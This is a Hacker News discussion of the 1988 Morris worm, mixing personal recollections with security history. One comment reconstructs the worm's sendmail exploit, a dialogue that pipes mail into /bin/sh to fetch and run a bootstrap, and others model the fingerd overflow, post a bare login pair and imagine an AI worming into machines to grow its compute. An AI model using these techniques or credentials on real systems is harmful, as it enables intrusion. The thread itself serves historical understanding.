Great course by the way.
username: field
password: technician
On a sidenote, what did you do after the course?
It is an amazing course though!
I was an intern at IBM in '88 and they shut down the (IIRC) two internet gateways to their corporate network (VNET) while people figured out what was going on. News moved slowly back then, and the idea of self-replicating software was unusual. Although IBM had had its own replicator the previous year [2].
[1] https://www.cs.columbia.edu/~gskc/security/rochlis89microsco...
floppy based viruses were well established and quite common
Memories of adding an illicit McAfee to autoexec.bat on my boot floppies...
The Mac's ease of use, compared to the PC's, also made it the juiciest virus target.
Even UUCP was still really fringe, and those weren't actually connected hosts on TCP/IP; they had their own dial-up mail exchange protocol, similar to FidoNet.
I also used UUCP for a few years, though it soon got replaced with full internet. We were a bit behind in Europe, but we caught up fast. In the beginning I also had to use bang paths to avoid some misconfiguration upstream. Fido was actually better at this, and the tool chain was much more user-friendly. Though you still needed multiple tools: one to do the dial-up and one to sort the retrieved mail, a "tosser" :)
Start here: https://en.wikipedia.org/wiki/Email
If that’s too much, think of the internet as a series of tubes, and email as a digital boomerang that returns with an out-of-office reply attached.
https://snl.no/Pål_Spilling#:~:text=Da%20Spilling%20kuttet%2...
Not much was happening in the Eng and CS buildings on campus (except for those that had to deal with the worm).
I'm not dunking on Paul Graham here. If you know anything about me, if anything, this is a point in his favor. :)
Not sure if that was supposed to be sarcasm[1] or was intended seriously, but for what it's worth, Hafner & Markoff have received a good deal of criticism over the years for playing fast and loose with the truth in that book. Most of that is specifically in regard to their treatment of Mitnick, and I'm not making any particular accusation here. Just sharing a thought that "it's in Katie Hafner and John Markoff's book" might not be terribly strong evidence of $WHATEVER.
Thanks for the answer, I'll check out the book.
It's a great read, but to echo what I said above: there have been a lot of questions over the years about the veracity of some of the details of their book. Take that for what it's worth. I enjoyed it enough that I've read it 3 or 4 times, but I do also suggest consulting other books on the same stories - particularly the stuff around K. Mitnick.
Clifford Stoll, author of The Cuckoo's Egg, wrote that "Rumors have it that [Morris] worked with a friend or two at Harvard's computing department (Harvard student Paul Graham sent him mail asking for 'Any news on the brilliant project')".
Has pg commented on this?
Some quotes from that:
> The worm, no one would have ever known that the worm existed, except there was a bug in it. That was the problem. The worm itself was absolutely harmless. But there was a bug in the code that controlled the number of copies that would spread to a given computer. And so the computer would get like 100 copies of the worm running on it, back in the day, when having 100 processes running on your computer would be enough to crash it.
>he called me and told me what had happened.
As someone old enough to have been a teenage hacker back in this timeframe, who spent his time on old Diversi-Dial dialup systems (which led to early internet systems via GNU/FSF's open-access policy, and from there to BITNET Relay), and who was around during the initial development of IRC right around this very year (1988), I can say that it was absolutely considered a bad act to do this sort of thing back then, even as just a prank or demonstration. (That made it kind of cool to back-then me, as a teenager, but it was certainly unethical in a professional sense, even for the time.)
... however when you oopsied and the shit hit the fan, you could get away with it if your dad worked for the NSA.
The vast majority of people who weren't RTM would have had a far more severely negative outcome in his situation.
https://www.google.com/search?q=site%3Apaulgraham.com+%22mor...
It’s been a long time since I read the book, but IIRC Cliff visited with Robert Morris (rtm’s dad) at the NSA when he traveled to Washington DC, and I think the worm and rtm are mentioned after he meets with the elder Robert.
Put everything in Microsoft Active Directory. Wait until it gets hacked. You will lose DNS, DHCP, email, file servers, web servers, endpoints, etc. Obviously, running a monoculture is a dumb thing to do if you want to keep your business running.
Maybe instead, run BIND on Linux servers, Apache on OpenBSD servers, have some Chromebooks, some Macs, etc. so everything doesn't go down together.
Really, it's not overblown... it's just common sense to diversify. Like we do with our diet/nutrition, with our financial investments, etc.
So by running BIND on Linux and Apache on OpenBSD and trying to tie it all into MSAD, what you're really doing is just expanding your attack surface, and once any of those are broken, attackers won't have to care about the state of the art in vulnerabilities to extend access from there.
The "monoculture" stuff is a product of a time when security pundits worried Microsoft was running the table on corporate IT. We're (generally) SaaS startup people here and very few of us run any Microsoft stuff. Almost all of us are better off extensively hardening a single Linux server environment than we are deliberately trying to sprinkle in NetBSD and Microsoft servers. That doesn't improve security; it just turns your network into a CTF challenge.
I'm not so sure the Morris worm was the turning point.
Since it's all locked up, I just reboot the big vax single user - that takes about 10 minutes so I also start on a couple of the suns. You have to realize that everything including desktops runs sendmail in this era, and when some of these machines come up they are ok for a sec and then sendmail starts really eating into the cpu.
I'm pretty bleary-eyed, but I walk around restarting everything single-user and taking sendmail out of the rc scripts. The TMC applications engineer comes in around 7 and gets me a cup of coffee. He manages to get someone to pick up in Cambridge and they tell him that's happening everywhere.
I knew Robert Morris was the financier of the Revolution. I know it's a plucky university outside of Pittsburgh with basketball and hockey programs that punch above their weight. I know there's a pastor in Texas who is...in some legal trouble...with the same name.
Now I have another one to remember!
As someone who wasn't taught better (partly due to not picking CS as a career stream), are there any languages which avoid such vulnerability issues? Does something like rust help with this?
Xerox PARC started with BCPL for their systems, but eventually created Mesa exactly for safe systems programming.
https://en.wikipedia.org/wiki/Mesa_(programming_language)
http://toastytech.com/guis/star.html
"The Mesa Programming Environment" - very first IDE for a systems language
https://www.digibarn.com/friends/curbow/star/XDEPaper.pdf
While Pascal as originally designed wasn't suitable for systems programming, various dialects sprang from it, with Object Pascal from Apple/Borland being the most famous one. By 1978 the first definition of Modula-2 was released, inspired by Mesa after Niklaus Wirth spent a sabbatical year at Xerox PARC. Years later, through a similar experience, the evolution of Mesa (Cedar) would influence him to come up with Oberon.
https://en.wikipedia.org/wiki/Modula-2
https://www.modula2.org/modula2-history.php
Then there was Ada, although compilers were too expensive and its hardware requirements too high for 1980s computers.
Also, the BASIC compilers on 8- and 16-bit home computers had support for low-level systems programming.
Among recent programming languages, something like Zig would be the closest to what those languages were offering: safety without a GC of some form.
Naturally this takes care of most C flaws, minus use-after-free; however, thanks to their type systems, one tends to use heap allocation less than in C, although it remains an issue.
1) He released it from MIT to avoid suspicion.
2) After he was convicted, he went from Cornell to Harvard to complete his Ph.D.
3) He became an assistant professor at MIT after that.
He had to be really spectacular/have crazy connections to still be able to finish his training at a top program and get a job at the institution he tried to frame.
Bob Morris wrote crypt(1), dc(1), crypt(3), libm, co-wrote the rainbow series, and did additional unknown work as a cryptographer for the NSA.
dmr writes about working with Bob Morris here: https://web.archive.org/web/20250121041734/https://www.bell-...
---
¹Awarders of the Ig Nobel prize
He was and is very smart. This is not disputed. He was 23 at the time. Not exactly a child.
The worm was surprisingly elaborate containing three separate remote exploits.
It probably took a few weeks to build and test.
So sabotaging thousands of what were, at the time, very expensive network-connected computers was a very deliberate action.
I posit that he likely did it to become famous and perhaps even successful, feeling safe with his dad’s position. And it worked. He did not end up in prison. He ended up cofounding Viaweb and YCombinator.
Unironically a great role model for YC. :/
Edit: I am not American. Please realize that I meant exactly what I wrote and not what some of you now imagine that I wrote. I have high trust in you!
To clarify: not a Trump fan.
He didn't reoffend (as far as we know), and in fact went on to become a highly-contributing member of society. His crime was not so egregious that recompense was impossible even in principle. I don't see how a harsher punishment for him would have produced an obviously better outcome. I think it would be more productive to argue that people who commit similar crimes should receive similar punishments as this, rather than arguing that he should have received a harsher punishment.
Everyone hacked. When the internet was connected to Sydney University early 90s, all the students were grabbing Stanfords /etc/passwd files and peeking at the open X displays of people in Sweden. Etc. All for fun / curiosity.
You can be sure that even rtm's Dad did similar, perhaps confined to his lab / peers.
Thank you for constantly removing some of the veils from the mystery of our computational universe.
The notion that you’re a very obvious leftist seems asinine to anyone who has seen your comment history in these digital catacombs for the last decades.
Is there something wrong with being a "leftist"?
His dad's also a badass and super fun to talk to. Never talked to the son though, but I'd love to some day.
Interesting random factoid: RTM's research in the early 2000s was on Chord [1], one of the earliest distributed hash tables. Chord inspired Kademlia [2], which later went on to power Limewire, Ethereum, and IPFS. So his research at MIT actually has had a bigger impact in terms of collected market cap than most YC startups have.
But looking into the specifics again after all these years [1], I read:
"The N.S.A. wanted to clamp a lid on as much of the affair as it could. Within days, the agency’s National Computer Security Center, where the elder Morris worked, asked Purdue University to remove from its computers information about the internal workings of the virus."
and that CERT at CMU was one response to the incident [2].
So there is a whiff of the incident being steered away from public prosecution and towards setting up security institutions.
Robert Morris did get a felony conviction, three years probation, and a $10K fine. As for hn users, aside from pg, Cliff Stoll has a minor role in the story.
[1] https://archive.nytimes.com/www.nytimes.com/times-insider/20...
Maybe I’m just getting old, but it seems like nothing was such a big deal at the time.
Everything seems to have gotten more uptight in the last few decades. I used to have a metal cutlery set that an international airline gave to every passenger on the plane.
"Computer crime" definitely was, though.
And by the mid to late 90's (I'd say about 1997) it was finally becoming "received wisdom" to most hackers that "this is real now: getting caught doing this stuff could mean actual jail time, fines, not getting into college, losing jobs, etc." Now I grew up in a rural part of NC, so we probably lagged other parts of the country in terms of information dispersal; other people may view the timeline differently, so YMMV.
What you didn't have back then was financial fraud on the scale that happens today, where even nominal damages run into 8-9 figures.
MIT really respects good hacks and good hackers. It was probably more effective than sending in some PDF of a paper.
Oooof in light of Aaron Swartz. He plugged directly into a network switch that was in an unlocked and unlabelled room at MIT so he could download faster and faced "charges of breaking and entering with intent, grand larceny, and unauthorized access to a computer network".
MIT really didn't lift a finger for this either.
>Swartz's attorneys requested that all pretrial discovery documents be made public, a move which MIT opposed
It's very hard to extract Robert Tappan Morris from the context of his father being an extremely powerful man when trying to figure out how he managed to get away with what he did.
MIT faulted over its support for students https://www.bostonglobe.com/metro/2014/02/14/mit/9VBBq9pBQ1z... https://news.ycombinator.com/item?id=7411312
Has the decompiled version.
- a github repo containing "the original, de-compiled source code for the Morris Worm" - see https://github.com/agiacalone/morris-worm-malware
- a high level report about the worm - see https://www.ee.torontomu.ca/~elf/hack/internet-worm.html
However the article has been updated so only the HN title has this flaw.
However I think this is a solvable problem, and I started solving it a while ago with decent results:
https://github.com/Hello1024/shared-tensor
When someone gets this working well, I could totally see a distributed AI being tasked with expanding its own pool of compute nodes by worming into things, developing new exploits, and sucking up more training data.
It doesn’t need to be fully decentralized, the control plane just needs some redundancy
You don’t need a full host compromise to send network traffic
He was sentenced to pay $10,050; today he would not get off that easily, I guess...
Another thing I didn't know (citing Wikipedia):
"In 1995, Morris cofounded Viaweb with Paul Graham, a start-up company that made software for building online stores. It would go on to be sold to Yahoo for $49 million[14], which renamed the software Yahoo! Store. "
and (same source):
"He is a longtime friend and collaborator of Paul Graham. Along with cofounding two companies with him, Graham dedicated his book ANSI Common Lisp to Morris and named the programming language that generates the online stores' web pages RTML (Robert T. Morris Language) in his honor."
60k computers (mostly at institutions) in 20 countries
Insomnia paid off a lot back then.
had RTM actually RTM the world might be a bit different than it is today.
He did do us all a service; people back then didn't seem to realize that buffer overflows were a security risk. The model people had then, including my old boss at one of my first jobs in the early 80s, was that if you fed a program invalid input and it crashed, this was your fault, because the program had a specification or documentation and you didn't comply with it.
It was Thomas Lopatic and 8lgm that really lit a fire under this (though likely they were inspired by Morris' work). Lopatic wrote the first public modern stack overflow exploit, for NCSA httpd on HP-UX, in 1995. Later that year, 8lgm teased (but didn't publish --- which was a big departure for them) a remote stack overflow in Sendmail 8.6.12 (it's important to understand what a big deal Sendmail vectors were at the time).
That 8lgm tease was what set Dave Goldsmith, Elias Levy, San Mehat, and Pieter Zatko (and presumably a bunch of other people I just don't know) off POC'ing the first wave of public stack overflow vulnerabilities. In the 9-18 months surrounding that work, you could look at basically any piece of privileged code, be it a remote service or an SUID binary or a kernel driver, and instantly spot overflows. It was the popularization with model exploits and articles like "Smashing The Stack" that really raised the alarm people took seriously.
That 7-year gap is really wild when you think about it, because during that period, while people jealously guarded fairly dumb bugs (like an errant pipe character in input to the calendar manager service that ran by default on SunOS, causing it to shell out to commands), you could have owned literally any system on the Internet, so prevalent were the bugs. And people blew them off!
I wrote a thread about this on Twitter back in the day, and Neil Woods from 8lgm responded... with the 8.6.12 exploit!
Mitnick didn't write any of this tooling --- presumably someone in jsz's circle did --- but it also wasn't super easy to use; spoofing tools of that vintage were kind of a nightmare to set up.
https://seclists.org/bugtraq/1995/Feb/109
> we've installed the NCSA HTTPD 1.3 on our WWW server (HP9000/720, HP-UX 9.01) and I've found, that it can be tricked into executing shell commands. Actually, this bug is similar to the bug in fingerd exploited by the internet worm. The HTTPD reads a maximum of 8192 characters when accepting a request from port 80.
I ps aux'ed and saw a hell of a lot of sendmail daemons running, but didn't realize till the next morning that we were actively under attack, being repeatedly but unsuccessfully finger daemon gets(3) buffer overflowed, and repeatedly and successfully sendmail daemon DEBUG'ed.
RTM's big mistake was not checking to see if a machine was already infected before re-infecting it and recursing, otherwise nobody would have noticed and he would have owned the entire internet.
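For what it's worth, published analyses describe the worm as probing for an existing copy but still reinfecting some of the time, which is what made the copies pile up. A minimal sketch of the difference; the 1-in-7 probability is the commonly cited figure from those analyses, not something from this thread:

```python
import random

def should_infect(already_infected, reinfect_prob=1/7):
    """Decide whether to start another copy on a host.

    A worm that returns False whenever a copy is already present
    stays at one copy per machine and is far harder to notice.
    The Morris worm is reported to have reinfected anyway about
    one time in seven (reinfect_prob is that cited figure).
    """
    if not already_infected:
        return True
    return random.random() < reinfect_prob

def copies_after(attempts, reinfect_prob=1/7, seed=1988):
    """Simulate repeated infection attempts against a single host."""
    rng = random.Random(seed)  # fixed seed for reproducibility
    copies = 0
    for _ in range(attempts):
        if copies == 0 or rng.random() < reinfect_prob:
            copies += 1
    return copies
```

With `reinfect_prob=0` the count stays at one copy forever; with 1/7 it grows roughly linearly in the number of attempts, which is how hosts ended up with the "100 copies" pg describes upthread.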
What's funny is that UMD was on MILNET via NSA's "secret" IMP 57 at Fort Meade, so RTM's worm was attacking us through his daddy's own MILNET PSN (Packet Switching Node)!
https://news.ycombinator.com/item?id=18376750
>At the University of Maryland, our network access was through the NSA's "secret" MILNET IMP 57 at Fort Mead. It was pretty obvious that UMD got their network access via NSA, because mimsy.umd.edu had a similar "*.57" IP address as dockmaster, tycho and coins.
>[...] Once I told the guy who answered, "Hi, this is the University of Maryland. Our connection to the NSA IMP seems to be down." He barked back: "You can't say that on the telephone! Are you calling on a blue phone?" (I can't remember the exact color, except that it wasn't red: that I would have remembered). I said, "You can't say NSA??! This is a green phone, but there's a black phone in the other room that I could call you back on, but then I couldn't see the hardware." And he said "No, I mean a voice secure line!" I replied, "You do know that this is a university, don't you? We only have black and green phones."
>[...more stuff about the rumored "Explosive Bolts" that could separate ARPANET and MILNET from Erik Fair and Milo Medin...]
More from Jordan Hubbard about his infamous "rwall" incident, when he accidentally sent an rwall message to almost every Unix host on the internet. I received it and sent him a cheerful reply within minutes, which he said was nicer than most of the 743 replies he got. Also: Milo Medin's description of Dennis Perry's reaction (head of DARPA/IPTO) to getting his Interleaf windows scribbled on ("absolutely livid"), Mark Crispin's flame about security, Jordan's response, and Dennis Perry himself replying to Jordan.
https://news.ycombinator.com/item?id=31822138
From: Dennis G. Perry <PERRY@vax.darpa.mil>
Date: Apr 6, 1987, 3:19 PM
Jordan, you are right in your assumptions that people will get annoyed
that what happened was allowed to happen.
By the way, I am the program manager of the Arpanet in the Information
Science and Technology Office of DARPA, located in Roslin (Arlington), not
the Pentagon. [...]
Here's my story of The Night of The Worm: https://news.ycombinator.com/item?id=29250313
DonHopkins on Nov 17, 2021 | parent | context | favorite | on: .plan
Yeah, 4.2 BSD fingerd was calling "gets" to read the name of who you were fingering into a small fixed size buffer on the stack.
https://man7.org/linux/man-pages/man3/gets.3.html
Chris Torek had hacked our version of fingerd (running on mimsy.umd.edu and its other Vax friends brillig, tove, and gyre) to implement logging, and while he was doing that, he noticed the fixed size buffer, and thoughtfully increased the size of the buffer a bit. Still a fixed size buffer using gets, but at least it was a big enough buffer to mitigate the attack, although the worm got in via sendmail anyway. And we had a nice log of all the attempted fingerd attacks!
The sendmail attack simply sent the "DEBUG" command to sendmail, which, being enabled by default, let you right in to where you could escape to a shell.
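The conversation was plain SMTP. This is a hedged reconstruction of its shape, following published analyses of the worm; the exact strings and file names here are illustrative, not the worm's literal bytes:

```python
# Shape of the worm's sendmail conversation, per published analyses:
# enter the undocumented debug mode, then name a "recipient" that is
# really a pipe into a shell, and mail it a bootstrap script.
dialogue = [
    "debug",                      # on by default in sendmail of the era
    "mail from: </dev/null>",
    "rcpt to: <\"| sed -e '1,/^$/d' | /bin/sh; exit 0\">",
    "data",
    "cd /usr/tmp",                # body: first-stage bootstrap script
    "cc -o x14481 x14481,l1.c",   # file names follow the $$-PID scheme
    "./x14481 <hostid> <port> <password>",  # placeholders, see below
    ".",
    "quit",
]
```

Everything after `data` is the message body, which sendmail's debug-mode "recipient" pipes straight into `/bin/sh` instead of delivering as mail.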
Immediately after the attack, "some random guy on the internet" suggested mitigating the sendmail DEBUG attack by editing your sendmail binary (Emacs hackers can do that easily of course, but vi losers had to suck eggs!), searching for the string "DEBUG", and replacing the "D" with a null character, thus disabling the "DEBUG" command.
But unfortunately that cute little hack didn't actually disable the "DEBUG" command: it just renamed the "DEBUG" command to the "" command! Which stopped the Morris worm on purpose, but not me by accident:
I found that out the day after the worm hit, when I routinely needed to check some bouncing email addresses on a mailing list I ran, so I went "telnet sun.com 80" and hit return a couple times like I usually do to clear out the telnet protocol negotiation characters, before sending an "EXPN" command. And the response to the "EXPN" command was a whole flurry of debugging information, since the second newline I sent activated debug mode by entering a blank line!
So I sent a friendly email to postmaster@sun.com reporting the enormous security hole they had introduced by patching the other enormous security hole.
You'd think that the Long Haired Dope Smoking Unix Wizards running the email system at sun.com wouldn't just apply random security patches from "some random guy on the internet" without thinking about the implications, but they did!
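You can see why the patch backfired with a toy model of a command-table lookup. This is just an illustration of the C string-matching effect, not sendmail's actual parser:

```python
def patch_debug(table):
    """Apply the 'random guy' binary patch: overwrite the 'D' of
    'DEBUG' with a NUL byte.  In C string terms the command's name
    is now "" (the empty string) -- it is renamed, not removed."""
    return ["\0" + cmd[1:] if cmd == "DEBUG" else cmd for cmd in table]

def c_string(s):
    """What a C strcmp() sees: everything up to the first NUL."""
    return s.split("\0", 1)[0]

def matches(table, input_line):
    """Does any command name in the table match this input line?"""
    return any(c_string(cmd) == input_line for cmd in table)

commands = ["HELO", "MAIL", "RCPT", "DATA", "DEBUG", "QUIT"]
patched = patch_debug(commands)
```

After patching, `matches(patched, "DEBUG")` is False, but `matches(patched, "")` is True: a blank input line now triggers the old DEBUG handler, exactly the hole described above.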
https://www.ee.torontomu.ca/~elf/hack/internet-worm.html
>The Sendmail Attack:
>In the sendmail attack, the worm opens a TCP connection to another machine's sendmail (the SMTP port), invokes debug mode, and sends a RCPT TO that requests its data be piped through a shell. That data, a shell script (first-stage bootstrap) creates a temporary second-stage bootstrap file called x$$,l1.c (where '$$' is the current process ID). This is a small (40-line) C program.
>The first-stage bootstrap compiles this program with the local cc and executes it with arguments giving the Internet hostid/socket/password of where it just came from. The second-stage bootstrap (the compiled C program) sucks over two object files, x$$,vax.o and x$$,sun3.o, from the attacking host. It has an array for 20 file names (presumably for 20 different machines), but only two (vax and sun) were compiled in to this code. It then figures out whether it's running under BSD or SunOS and links the appropriate file against the C library to produce an executable program called /usr/tmp/sh - so it looks like the Bourne shell to anyone who looked there.
>The Fingerd Attack:
>In the fingerd attack, it tries to infiltrate systems via a bug in fingerd, the finger daemon. Apparently this is where most of its success was (not in sendmail, as was originally reported). When fingerd is connected to, it reads its arguments from a pipe, but doesn't limit how much it reads. If it reads more than the internal 512-byte buffer allowed, it writes past the end of its stack. After the stack is a command to be executed ("/usr/ucb/finger") that actually does the work. On a VAX, the worm knew how much further from the stack it had to clobber to get to this command, which it replaced with the command "/bin/sh" (the Bourne shell). So instead of the finger command being executed, a shell was started with no arguments. Since this is run in the context of the finger daemon, stdin and stdout are connected to the network socket, and all the files were sucked over just like the shell that sendmail provided.
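The mechanism in that last paragraph can be modeled in a few lines: a fixed-size buffer with the command string sitting right after it in memory, and an unbounded copy that runs past the buffer's end. The sizes and layout here are a simplified illustration, not the actual VAX stack frame:

```python
def fingerd_memory(request, buf_size=512):
    """Toy model of the fingerd stack: a fixed-size input buffer
    followed immediately by the command fingerd will run.
    The copy, like gets(3), has no bounds check."""
    command = b"/usr/ucb/finger\0"
    memory = bytearray(buf_size) + bytearray(command)
    for i, byte in enumerate(request):   # unbounded copy!
        memory[i] = byte
    # what fingerd "executes": the C string at offset buf_size
    cmd = bytes(memory[buf_size:]).split(b"\0", 1)[0]
    return cmd.decode()

# A normal request leaves the command alone...
assert fingerd_memory(b"rtm\0") == "/usr/ucb/finger"

# ...but a 512-byte pad followed by new data overwrites it, which is
# essentially what the worm's oversized finger request did.
overflow = b"\0" * 512 + b"/bin/sh\0"
assert fingerd_memory(overflow) == "/bin/sh"
```

The real worm overwrote carefully computed offsets past the buffer rather than a neat adjacent string, but the effect was the same: the shell started in fingerd's context, with stdin and stdout still wired to the network socket.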
While we're much more conscientious and better at security than we were way back then, things are certainly not totally secure.
The best answer I have is the same as what a bio professor told me once about designer plagues: it hasn't happened because nobody's done it. The capability is out there, and the vulnerability is out there.
(Someone will chime in about COVID lab leak theories, but even if that's true that's not what I mean. If that happened it was the worst industrial accident in history, not an intentional designer plague.)
https://en.wikipedia.org/wiki/Botnet#Historical_list_of_botn...
I could be wrong, but I've come to believe that despite the hype they have very little capability.
https://en.wikipedia.org/wiki/Blaster_(computer_worm)
https://en.wikipedia.org/wiki/SQL_Slammer
https://en.wikipedia.org/wiki/Sasser_(computer_worm)
Bill Gates sent out the "Trustworthy Computing" memo to harden Windows and make it somewhat secure.
Essentially, Windows used to be trivial to exploit: every single service was exposed to the internet by default, full of very trivial buffer overflows that dovetailed nicely into remote code execution.
Since then, Windows has stopped exposing everything to the internet by default and added a firewall, fixed most buffer overflows in entry points of these services, and made it substantially harder to turn most vulnerabilities into the kind of remote code execution you would use to make simple worms.
>better at security than we were way back then
In some ways this is dramatically understated. Now the majority of malware comes from getting people to click on links, targeted attacks that drop it, piggyback riding in on infected downloads, and other forms of just getting the victim to run your code. Worms and botnets are either something you "Willingly" install through "free" VPNs, or target absolutely broken and insecure routers.
The days where simply plugging a computer into the internet would result in it being infected and immediately trying to infect 100 other computers, with no interaction, are pretty much gone. For all the bitching about forced updates and UAC and other security measures, they basically work.
It's most obviously paralleled by Samy Kamkar's MySpace worm, which exploited fairly similar too-much-trust territory.